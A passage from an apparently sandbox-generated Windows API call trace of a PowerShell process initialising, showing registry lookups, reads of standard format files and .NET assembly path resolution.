	[0751.532] CoTaskMemAlloc (cb=0x5a) returned 0x1b804f80
	[0751.532] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b804f80, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0751.532] CoTaskMemFree (pv=0x1b804f80) 
	[0751.532] RegCloseKey (hKey=0x318) returned 0x0
	[0751.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.537] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd37c694c, Data2=0xf3ab, Data3=0x47b5, Data4=([0]=0xa8, [1]=0x2b, [2]=0xfd, [3]=0xcb, [4]=0x48, [5]=0x38, [6]=0x68, [7]=0xc5))) returned 0x0
	[0751.544] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9d8d8930, Data2=0x6d20, Data3=0x4d78, Data4=([0]=0x9c, [1]=0x69, [2]=0xba, [3]=0xff, [4]=0x72, [5]=0x86, [6]=0x70, [7]=0x63))) returned 0x0
	[0751.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0751.547] SetErrorMode (uMode=0x1) returned 0x1
	[0751.547] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0751.547] GetFileType (hFile=0x318) returned 0x1
	[0751.547] SetErrorMode (uMode=0x1) returned 0x1
	[0751.548] GetFileType (hFile=0x318) returned 0x1
	[0751.548] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.548] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.549] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.085] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.086] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.088] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0xfb2, lpOverlapped=0x0) returned 1
	[0753.088] ReadFile (in: hFile=0x318, lpBuffer=0x34f63e2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f63e2*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0753.088] ReadFile (in: hFile=0x318, lpBuffer=0x34f6cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34f6cc8*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0753.088] CloseHandle (hObject=0x318) returned 1
	[0753.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0753.088] SetErrorMode (uMode=0x1) returned 0x1
	[0753.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0753.089] SetErrorMode (uMode=0x1) returned 0x1
	[0753.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0753.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0753.097] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0753.097] CoTaskMemAlloc (cb=0x5a) returned 0x1b804f10
	[0753.097] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b804f10, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0753.097] CoTaskMemFree (pv=0x1b804f10) 
	[0753.097] RegCloseKey (hKey=0x318) returned 0x0
	[0753.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0753.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0753.098] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xedd7af1d, Data2=0xeb09, Data3=0x4045, Data4=([0]=0xad, [1]=0xaf, [2]=0x9a, [3]=0xab, [4]=0x37, [5]=0x62, [6]=0x48, [7]=0xc9))) returned 0x0
	[0753.104] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbdeab86f, Data2=0x5cad, Data3=0x4f74, Data4=([0]=0xb3, [1]=0xdd, [2]=0xb7, [3]=0x89, [4]=0xa7, [5]=0xc6, [6]=0x5, [7]=0x56))) returned 0x0
	[0753.105] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe2e08404, Data2=0x8dac, Data3=0x433e, Data4=([0]=0x99, [1]=0xa, [2]=0xf3, [3]=0x49, [4]=0x40, [5]=0x87, [6]=0x98, [7]=0x17))) returned 0x0
	[0753.106] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe09fe8b3, Data2=0xd49e, Data3=0x49be, Data4=([0]=0x89, [1]=0x30, [2]=0xd8, [3]=0x55, [4]=0xc4, [5]=0x23, [6]=0xca, [7]=0x65))) returned 0x0
	[0753.106] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfd90bef8, Data2=0x22db, Data3=0x4824, Data4=([0]=0xb3, [1]=0xbc, [2]=0x3, [3]=0x27, [4]=0x8, [5]=0x59, [6]=0x62, [7]=0xd1))) returned 0x0
	[0753.107] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4484574, Data2=0xc699, Data3=0x41e9, Data4=([0]=0x83, [1]=0xd3, [2]=0x83, [3]=0x2a, [4]=0xc9, [5]=0x2b, [6]=0x59, [7]=0xd2))) returned 0x0
	[0753.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.107] SetErrorMode (uMode=0x1) returned 0x1
	[0753.108] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0753.108] GetFileType (hFile=0x318) returned 0x1
	[0753.108] SetErrorMode (uMode=0x1) returned 0x1
	[0753.108] GetFileType (hFile=0x318) returned 0x1
	[0753.108] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.108] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.108] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.109] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.109] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.109] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0753.109] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0xaca, lpOverlapped=0x0) returned 1
	[0753.109] ReadFile (in: hFile=0x318, lpBuffer=0x33a4d7a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a4d7a*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0753.110] ReadFile (in: hFile=0x318, lpBuffer=0x33a5748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33a5748*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0753.110] CloseHandle (hObject=0x318) returned 1
	[0753.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.110] SetErrorMode (uMode=0x1) returned 0x1
	[0753.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0753.110] SetErrorMode (uMode=0x1) returned 0x1
	[0753.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.111] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0753.111] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0753.111] CoTaskMemAlloc (cb=0x5a) returned 0x1b804f10
	[0753.111] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b804f10, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0753.111] CoTaskMemFree (pv=0x1b804f10) 
	[0753.111] RegCloseKey (hKey=0x318) returned 0x0
	[0753.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0753.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0753.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0754.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0754.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0754.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0754.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0754.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0754.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0754.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0754.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0754.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0754.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0754.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0754.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0754.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0754.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0754.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0754.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0755.402] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xddf18a00, Data2=0xc6be, Data3=0x4f9f, Data4=([0]=0x82, [1]=0x46, [2]=0x69, [3]=0x9a, [4]=0x21, [5]=0xc6, [6]=0xe, [7]=0xc8))) returned 0x0
	[0755.403] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf7006691, Data2=0x4555, Data3=0x44aa, Data4=([0]=0xbe, [1]=0xb1, [2]=0xfa, [3]=0xa2, [4]=0xf6, [5]=0xcd, [6]=0x39, [7]=0xeb))) returned 0x0
	[0755.403] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x943707b5, Data2=0xc1af, Data3=0x4734, Data4=([0]=0xbe, [1]=0x96, [2]=0x9e, [3]=0xea, [4]=0x15, [5]=0x2d, [6]=0xba, [7]=0x99))) returned 0x0
	[0755.404] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf26ed936, Data2=0x9fac, Data3=0x4708, Data4=([0]=0x9a, [1]=0xfa, [2]=0x50, [3]=0xd, [4]=0xaa, [5]=0xb9, [6]=0x6a, [7]=0xce))) returned 0x0
	[0755.404] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x777d8966, Data2=0x7ac3, Data3=0x4001, Data4=([0]=0x93, [1]=0xb0, [2]=0x6b, [3]=0xc1, [4]=0x29, [5]=0x51, [6]=0x90, [7]=0xdf))) returned 0x0
	[0755.404] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.404] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfffb650c, Data2=0x3ae4, Data3=0x4ec9, Data4=([0]=0xb1, [1]=0xf0, [2]=0x1e, [3]=0xa, [4]=0x52, [5]=0x38, [6]=0xbf, [7]=0xbc))) returned 0x0
	[0755.404] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x5df49483, Data2=0xf91f, Data3=0x431d, Data4=([0]=0x86, [1]=0x49, [2]=0xbf, [3]=0x27, [4]=0x1c, [5]=0x21, [6]=0xd2, [7]=0x49))) returned 0x0
	[0755.405] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0755.405] GetFileType (hFile=0x318) returned 0x1
	[0755.405] SetErrorMode (uMode=0x1) returned 0x1
	[0755.405] GetFileType (hFile=0x318) returned 0x1
	[0755.405] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.405] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
